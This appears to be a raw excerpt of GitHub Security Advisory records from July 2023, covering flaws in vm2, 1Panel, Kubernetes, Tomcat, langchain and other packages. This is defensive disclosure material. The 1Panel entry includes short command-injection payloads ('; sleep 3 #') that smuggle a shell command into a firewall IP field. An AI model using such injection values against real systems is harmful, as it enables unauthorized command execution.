[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39010'}, {'type': 'WEB', 'url': 'https://github.com/lessthanoptimal/BoofCV/issues/406'}, {'type': 'WEB', 'url': 'https://github.com/lessthanoptimal/BoofCV/commit/0da6139ff69fd5a49359854ab01935d06c7f5aac'}, {'type': 'PACKAGE', 'url': 'https://github.com/lessthanoptimal/BoofCV'}]
{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-28T20:56:56Z', 'nvd_published_at': None}
1.4.0
GHSA-3fhx-3vvg-2j84
2023-07-06T15:32:02Z
2023-07-04T15:30:18Z
null
['CVE-2023-2974']
quarkus-core vulnerable to client driven TLS cipher downgrading
A vulnerability was found in quarkus-core. This vulnerability occurs because the TLS protocol configured with quarkus.http.ssl.protocols is not enforced, and the client can force the selection of the weaker supported TLS protocol.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'io.quarkus:quarkus-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.16.8.Final'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2974'}, {'type': 'WEB', 'url': 'https://github.com/quarkusio/quarkus/pull/34469'}, {'type': 'WEB', 'url': 'https://github.com/quarkusio/quarkus/commit/468397ae53a8d6aae933d0d406f94965e97d1935'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:3809'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2023-2974'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2211026'}, {'type': 'PACKAGE', 'url': 'https://github.com/quarkusio/quarkus'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T15:32:02Z', 'nvd_published_at': None}
1.4.0
GHSA-g644-9gfx-q4q4
2023-07-24T20:03:41Z
2023-07-13T17:01:58Z
null
['CVE-2023-37903']
vm2 Sandbox Escape vulnerability
In vm2 for versions up to 3.9.19, Node.js custom inspect function allows attackers to escape the sandbox and run arbitrary code. ### Impact Remote Code Execution, assuming the attacker has arbitrary code execution primitive inside the context of vm2 sandbox. ### Patches None. ### Workarounds None. ### References PoC is to be disclosed on or after the 5th of September. ### Similarity with [CVE-2023-37466](https://nvd.nist.gov/vuln/detail/CVE-2023-37466) While this advisory might look similar to [CVE-2023-37466](https://nvd.nist.gov/vuln/detail/CVE-2023-37466), it is a completely different way of escaping the sandbox. ### For more information If you have any questions or comments about this advisory: - Open an issue in [VM2](https://github.com/patriksimek/vm2) Thanks to [Xion](https://twitter.com/0x10n) (SeungHyun Lee) of [KAIST Hacking Lab](https://kaist-hacking.github.io/) for disclosing this vulnerability.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'vm2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.9.19'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/security/advisories/GHSA-g644-9gfx-q4q4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37903'}, {'type': 'PACKAGE', 'url': 'https://github.com/patriksimek/vm2'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230831-0007/'}]
{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-13T17:01:58Z', 'nvd_published_at': None}
1.4.0
GHSA-p9xf-74xh-mhw5
2023-07-27T18:49:02Z
2023-07-18T19:10:58Z
null
['CVE-2023-37477']
1Panel command injection vulnerability in Firewall ip functionality
### Summary An OS command injection vulnerability exists in 1Panel firewall functionality. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. ### Details 1Panel firewall functionality `/hosts/firewall/ip` endpoint read user input without validation, the attacker extends the default functionality of the application, which execute system commands. ### PoC the payload `; sleep 3 #` will lead server response in 3 seconds ![image](https://user-images.githubusercontent.com/4935500/252299676-bc4a8b92-e475-40ee-a92a-fec9fad7a6c3.png) the payload `; sleep 6 #` will lead server response in 6 seconds ![image](https://user-images.githubusercontent.com/4935500/252299871-766cc411-69e5-4c6c-b4ff-7774fa974ea0.png) ### Impact An attacker can execute arbitrary code on the target system, which can lead to a complete compromise of the system. ### Patches The vulnerability has been fixed in v1.4.3. ### Workarounds It is recommended to upgrade the version to v1.4.3. ### References If you have any questions or comments about this advisory: Open an issue in https://github.com/1Panel-dev/1Panel Email us at wanghe@fit2cloud.com
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/1Panel-dev/1Panel'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.4.2'}}]
[{'type': 'WEB', 'url': 'https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-p9xf-74xh-mhw5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37477'}, {'type': 'WEB', 'url': 'https://github.com/1Panel-dev/1Panel/commit/e17b80cff4975ee343568ff526b62319f499005d'}, {'type': 'PACKAGE', 'url': 'https://github.com/1Panel-dev/1Panel'}, {'type': 'WEB', 'url': 'https://github.com/1Panel-dev/1Panel/releases/tag/v1.4.3'}]
{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-18T19:10:58Z', 'nvd_published_at': None}
1.4.0
GHSA-cgcv-5272-97pr
2023-07-07T16:29:50Z
2023-07-03T21:30:57Z
null
['CVE-2023-2728']
Kubernetes mountable secrets policy bypass
Users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using ephemeral containers. The policy ensures pods running with a service account may only reference secrets specified in the service account’s secrets field. Kubernetes clusters are only affected if the ServiceAccount admission plugin and the `kubernetes.io/enforce-mountable-secrets` annotation are used together with ephemeral containers.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.27.0'}, {'fixed': '1.27.3'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.26.0'}, {'fixed': '1.26.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.25.0'}, {'fixed': '1.25.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.24.15'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2728'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/issues/118640'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/pull/118356'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/pull/118471'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/pull/118473'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/pull/118474'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/pull/118512'}, {'type': 'PACKAGE', 'url': 'https://github.com/kubernetes/kubernetes'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/kubernetes-security-announce/c/vPWYJ_L84m8'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/06/3'}]
{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T15:10:06Z', 'nvd_published_at': None}
1.4.0
GHSA-4hpj-8rhv-9x87
2023-07-05T22:42:09Z
2023-07-05T22:42:09Z
null
['CVE-2023-36814']
Products.CMFCore unauthenticated denial of service and crash via unchecked use of input with Python's marshal module
### Impact The use of Python's marshal module to handle unchecked input in a public method on `PortalFolder` objects can lead to an unauthenticated denial of service and crash situation. The code in question is exposed by all portal software built on top of `Products.CMFCore`, such as Plone. All deployments are vulnerable. ### Patches The code has been fixed in `Products.CMFCore` version 3.2. ### Workarounds Users can make the affected `decodeFolderFilter` method unreachable by editing the `PortalFolder.py` module in `Products.CMFCore` by hand and then restarting Zope. Go to line 233 of `PortalFolder.py` and remove both the `@security.public` decorator for `decodeFolderFilter` as well as the method's entire docstring. This is safe because the method is not actually used by current code. ### References - Products.CMFCore security advisory [GHSA-4hpj-8rhv-9x87](https://github.com/zopefoundation/Products.CMFCore/security/advisories/GHSA-4hpj-8rhv-9x87) ### Credits Thanks go to Nicolas VERDIER from onepoint. ### For more information If you have any questions or comments about this advisory: - Open an issue in the [Products.CMFCore issue tracker](https://github.com/zopefoundation/Products.CMFCore/issues) - Email us at [security@plone.org](mailto:security@plone.org)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'Products.CMFCore'}, 'ecosystem_specific': {'affected_functions': ['Products.CMFCore.PortalFolder.PortalFolderBase.encodeFolderFilter', 'Products.CMFCore.PortalFolder.PortalFolderBase.decodeFolderFilter']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0'}, {'fixed': '3.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Products.CMFCore'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/zopefoundation/Products.CMFCore/security/advisories/GHSA-4hpj-8rhv-9x87'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36814'}, {'type': 'WEB', 'url': 'https://github.com/zopefoundation/Products.CMFCore/commit/40f03f43a60f28ca9485c8ef429efef729be54e5'}, {'type': 'WEB', 'url': 'https://github.com/zopefoundation/Products.CMFCore/commit/c1847a9042abe7965271fa73762dfe091b576de'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/products-cmfcore/PYSEC-2023-113.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/zopefoundation/Products.CMFCore'}]
{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-05T22:42:09Z', 'nvd_published_at': None}
1.4.0
GHSA-cx6h-86xw-9x34
2023-07-06T23:34:50Z
2023-07-06T21:14:59Z
null
['CVE-2023-28709']
Apache Tomcat - Fix for CVE-2023-24998 was incomplete
The fix for CVE-2023-24998 was incomplete. If non-default HTTP connector settings were used such that the maxParameterCount could be reached using query string parameters and a request was submitted that supplied exactly maxParameterCount parameters in the query string, the limit for uploaded request parts could be bypassed with the potential for a denial of service to occur.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0-M2'}, {'fixed': '11.0.0-M5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.1.5'}, {'fixed': '10.1.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.71'}, {'fixed': '9.0.74'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.85'}, {'fixed': '8.5.88'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28709'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/tomcat'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/7wvxonzwb7k9hx9jt3q33cmy7j97jo3j'}, {'type': 'WEB', 'url': 'https://tomcat.apache.org/security-10.html'}, {'type': 'WEB', 'url': 'https://tomcat.apache.org/security-11.html'}, {'type': 'WEB', 'url': 'https://tomcat.apache.org/security-8.html'}, {'type': 'WEB', 'url': 'https://tomcat.apache.org/security-9.html'}]
{'cwe_ids': ['CWE-193'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T23:34:50Z', 'nvd_published_at': None}
1.4.0
GHSA-hgxv-3497-3hhj
2023-07-06T20:39:13Z
2023-07-04T18:30:58Z
2023-07-06T20:38:21Z
[]
Duplicate Advisory: @fastify/oauth2 Oauth2 state parameter reuse
## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-g8x5-p9qc-cf95. This link is maintained to preserve external references. ## Original Description All versions of @fastify/oauth2 used a statically generated state parameter at startup time and were used across all requests for all users. The purpose of the Oauth2 state parameter is to prevent Cross-Site-Request-Forgery attacks. As such, it should be unique per user and should be connected to the user's session in some way that will allow the server to validate it. v7.2.0 changes the default behavior to store the state in a cookie with the http-only and same-site=lax attributes set. The state is now by default generated for every user. Note that this contains a breaking change in the checkStateFunction function, which now accepts the full Request object.
[]
[{'package': {'ecosystem': 'npm', 'name': '@fastify/oauth2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.2.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31999'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/2020418'}, {'type': 'WEB', 'url': 'https://auth0.com/docs/secure/attack-protection/state-parameters'}, {'type': 'PACKAGE', 'url': 'https://github.com/fastify/fastify-oauth2'}, {'type': 'WEB', 'url': 'https://github.com/fastify/fastify-oauth2/releases/tag/v7.2.0'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T20:38:21Z', 'nvd_published_at': None}
1.4.0
GHSA-gch5-hwqf-mxhp
2023-07-27T19:29:41Z
2023-07-27T19:29:41Z
null
[]
Unsoundness in `intern` methods on `intaglio` symbol interners
Affected versions of this crate have a stacked borrows violation when creating references to interned contents. All interner types are affected. The flaw was corrected in version 1.9.0 by reordering move and borrowing operations and storing interned contents by raw pointer instead of as a `Box`.
[]
[{'package': {'ecosystem': 'crates.io', 'name': 'intaglio'}, 'ecosystem_specific': {'affected_functions': ['intaglio::SymbolTable::intern', 'intaglio::bytes::SymbolTable::intern', 'intaglio::cstr::SymbolTable::intern', 'intaglio::osstr::SymbolTable::intern', 'intaglio::path::SymbolTable::intern']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/artichoke/intaglio/pull/236'}, {'type': 'PACKAGE', 'url': 'https://github.com/artichoke/intaglio'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0048.html'}]
{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-07-27T19:29:41Z', 'nvd_published_at': None}
1.4.0
GHSA-8gc7-whph-rx5q
2023-07-20T14:14:14Z
2023-07-12T18:30:38Z
null
['CVE-2023-37955']
Jenkins Test Results Aggregator Plugin vulnerable to Cross Site Request Forgery
Jenkins Test Results Aggregator Plugin 1.2.13 and earlier does not perform a permission check in an HTTP endpoint implementing form validation. This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified username and password. Additionally, this HTTP endpoint does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:test-results-aggregator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.2.13'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37955'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-3122'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/2'}]
{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T22:31:42Z', 'nvd_published_at': None}
1.4.0
GHSA-2rhg-hqq9-8xjh
2023-07-14T15:51:46Z
2023-07-08T09:30:27Z
null
['CVE-2023-3553']
TeamPass information exposure vulnerability
TeamPass prior to 3.0.10 allows unauthenticated actors to view application-specific and user data and files by viewing an endpoint directory listing.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.10'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3553'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/teampass/commit/e9f90b746fdde135da3c7fbe4fa22fe2bd32e66b'}, {'type': 'PACKAGE', 'url': 'https://github.com/nilsteampassnet/teampass'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/857f002a-2794-4807-aa5d-2f340de01870'}]
{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-10T21:54:41Z', 'nvd_published_at': None}
1.4.0
GHSA-g9cv-v3v4-3h8r
2023-07-12T17:30:06Z
2023-07-12T12:31:36Z
null
['CVE-2023-30429']
Apache Pulsar Incorrect Authorization vulnerability
Incorrect Authorization vulnerability in Apache Software Foundation Apache Pulsar. This issue affects Apache Pulsar: before 2.10.4, and 2.11.0. When a client connects to the Pulsar Function Worker via the Pulsar Proxy where the Pulsar Proxy uses mTLS authentication to authenticate with the Pulsar Function Worker, the Pulsar Function Worker incorrectly performs authorization by using the Proxy's role for authorization instead of the client's role, which can lead to privilege escalation, especially if the proxy is configured with a superuser role. The recommended mitigation for impacted users is to upgrade the Pulsar Function Worker to a patched version. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.4. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.1. 3.0 Pulsar Function Worker users are unaffected. Any users running the Pulsar Function Worker for 2.9.* and earlier should upgrade to one of the above patched versions.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.pulsar:pulsar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.10.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.pulsar:pulsar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.11.0'}, {'fixed': '2.11.1'}]}], 'versions': ['2.11.0']}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30429'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/pulsar'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/v0gcvvxswr830314q4b1kybsfmcf3jf8'}]
{'cwe_ids': ['CWE-863'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T17:30:06Z', 'nvd_published_at': None}
1.4.0
GHSA-3xrr-7m6p-p7xh
2023-07-06T22:00:23Z
2023-07-06T19:24:13Z
null
['CVE-2023-26119']
HtmlUnit Code Injection vulnerability
Versions of the package `net.sourceforge.htmlunit:htmlunit` from 0 and before 3.0.0 are vulnerable to Remote Code Execution (RCE) via XSTL, when browsing the attacker’s webpage.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'net.sourceforge.htmlunit:htmlunit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26119'}, {'type': 'WEB', 'url': 'https://github.com/HtmlUnit/htmlunit/commit/641325bbc84702dc9800ec7037aec061ce21956b'}, {'type': 'PACKAGE', 'url': 'https://github.com/HtmlUnit/htmlunit'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JAVA-NETSOURCEFORGEHTMLUNIT-3252500'}, {'type': 'WEB', 'url': 'https://siebene.github.io/2022/12/30/HtmlUnit-RCE/'}]
{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T22:00:23Z', 'nvd_published_at': '2023-04-03T05:15:00Z'}
1.4.0
GHSA-8wfh-qxxv-3q8c
2023-07-31T19:01:32Z
2023-07-26T12:30:28Z
null
['CVE-2023-38669']
Use after free in PaddlePaddle
Use after free in paddle.diagonal in PaddlePaddle before 2.5.0. This resulted in a potentially exploitable condition.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'paddlepaddle'}, 'ecosystem_specific': {'affected_functions': ['paddle.diagonal']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38669'}, {'type': 'WEB', 'url': 'https://github.com/PaddlePaddle/Paddle/commit/43981874f5e1683b855eab871092fa9be58d6a44'}, {'type': 'PACKAGE', 'url': 'https://github.com/PaddlePaddle/Paddle'}, {'type': 'WEB', 'url': 'https://github.com/PaddlePaddle/Paddle/blob/develop/security/advisory/pdsa-2023-001.md'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/paddlepaddle/PYSEC-2023-122.yaml'}]
{'cwe_ids': ['CWE-416'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-26T22:30:22Z', 'nvd_published_at': None}
1.4.0
GHSA-2qmj-7962-cjq8
2023-07-10T19:07:59Z
2023-07-03T21:30:57Z
null
['CVE-2023-36258']
langchain arbitrary code execution vulnerability
An issue in langchain allows an attacker to execute arbitrary code via the PALChain in the python exec method.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'langchain'}, 'ecosystem_specific': {'affected_functions': ['langchain.chains.PALChain']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.222'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36258'}, {'type': 'WEB', 'url': 'https://github.com/hwchase17/langchain/issues/5872'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/issues/5872'}, {'type': 'WEB', 'url': 'https://github.com/hwchase17/langchain/pull/6003'}, {'type': 'PACKAGE', 'url': 'https://github.com/hwchase17/langchain'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/langchain/PYSEC-2023-98.yaml'}]
{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T15:11:23Z', 'nvd_published_at': None}
1.4.0
GHSA-f99h-w337-mv56
2023-07-12T17:29:24Z
2023-07-12T17:29:24Z
null
[]
iprange may panic when parsing ranges with invalid masks
Parsing a range with a mask larger than 32 bits causes a panic.
[]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/malfunkt/iprange'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.9.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/malfunkt/iprange/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/malfunkt/iprange'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T17:29:24Z', 'nvd_published_at': None}
1.4.0
GHSA-gg44-xm5p-x9cm
2023-07-12T22:30:10Z
2023-07-12T18:30:39Z
null
['CVE-2023-37965']
Jenkins ElasticBox CI Plugin missing permission check
Jenkins ElasticBox CI Plugin 5.0.1 and earlier does not perform permission checks in several HTTP endpoints. This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:elasticbox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.0.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37965'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-3131'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/2'}]
{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T22:30:10Z', 'nvd_published_at': None}
1.4.0
GHSA-rchx-rvh2-vx5j
2023-08-01T21:40:55Z
2023-07-26T21:30:18Z
null
['CVE-2023-3414']
Credential leakage in Jenkins Plug-in for ServiceNow
A cross-site request forgery vulnerability exists in versions of the Jenkins Plug-in for ServiceNow DevOps prior to 1.38.1 that, if exploited successfully, could cause the unwanted exposure of sensitive information. To address this issue, apply the 1.38.1 version of the Jenkins plug-in for ServiceNow DevOps on your Jenkins server. No changes are required on your instances of the Now Platform.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'io.jenkins.plugins:servicenow-devops'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.38.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3414'}, {'type': 'WEB', 'url': 'https://github.com/jenkinsci/servicenow-devops-plugin/commit/67192e24099787ad732b41d581f20714d4253921'}, {'type': 'WEB', 'url': 'https://github.com/jenkinsci/servicenow-devops-plugin/commit/d7d2422b016995402dd245d9c9c5c2f4cf00c691'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/servicenow-devops-plugin'}, {'type': 'WEB', 'url': 'https://github.com/jenkinsci/servicenow-devops-plugin/releases/tag/v1.38.1'}, {'type': 'WEB', 'url': 'https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1434118'}]
{'cwe_ids': ['CWE-200', 'CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-26T22:39:17Z', 'nvd_published_at': None}
1.4.0
GHSA-8c6q-26w6-qwhg
2023-07-17T14:08:19Z
2023-07-17T09:30:23Z
null
['CVE-2023-3700']
Easy!Appointments Improper Access Control vulnerability
Easy!Appointments 1.4.3 and prior has an Improper Access Control vulnerability. This issue is patched at commit b37b46019553089db4f22eb2fe998bca84b2cb64 and anticipated to be part of version 1.5.0.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'alextselegidis/easyappointments'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.4.3'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3700'}, {'type': 'WEB', 'url': 'https://github.com/alextselegidis/easyappointments/commit/b37b46019553089db4f22eb2fe998bca84b2cb64'}, {'type': 'PACKAGE', 'url': 'https://github.com/alextselegidis/easyappointments'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/e8d530db-a6a7-4f79-a95d-b77654cc04f8'}]
{'cwe_ids': ['CWE-284', 'CWE-639'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-17T14:08:19Z', 'nvd_published_at': None}
1.4.0
GHSA-9x44-9pgq-cf45
2023-07-19T10:54:45Z
